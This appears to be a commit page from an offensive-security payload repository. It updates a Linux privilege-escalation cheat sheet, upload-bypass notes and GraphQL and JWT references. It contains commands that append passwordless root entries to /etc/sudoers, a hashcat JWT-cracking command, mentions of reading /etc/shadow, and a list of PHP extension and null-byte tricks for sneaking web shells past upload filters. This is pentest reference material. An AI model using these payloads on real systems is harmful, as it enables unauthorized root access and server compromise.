PrivEsc - sudoers + Upload PHP

This commit is contained in:
Swissky 2019-09-02 12:36:40 +02:00
parent 3ca07aeb7a
commit 2b1900e046
5 changed files with 36 additions and 6 deletions
GraphQL Injection
JSON Web Token
Methodology and Resources
Upload Insecure Files

View File

@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
* [Graphql Bug to Steal Anyones Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)

View File

@ -250,7 +250,7 @@ Secret is "Sn1f"
### Hashcat
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
```bash
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a

View File

@ -84,7 +84,7 @@
* Checks if password hashes are stored in /etc/passwd
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
* Attempt to read restricted files i.e. /etc/shadow
* List current users history files (i.e .bash_history, .nano_history etc.)
* List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
* Basic SSH checks
* Privileged access:
* Which users have recently used sudo
@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
```
## NFS Root Squashing
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
The following exploits are known to work well.
The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
### CVE-2016-5195 (DirtyCow)

View File

@ -0,0 +1,20 @@
.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg

View File

@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
### Upload tricks
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
- Null byte (works well against `pathinfo()`)
* .php%00.gif
* .php\x00.gif
* .php%00.png
* .php\x00.png
* .php%00.jpg
* .php\x00.jpg
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
### Picture upload with LFI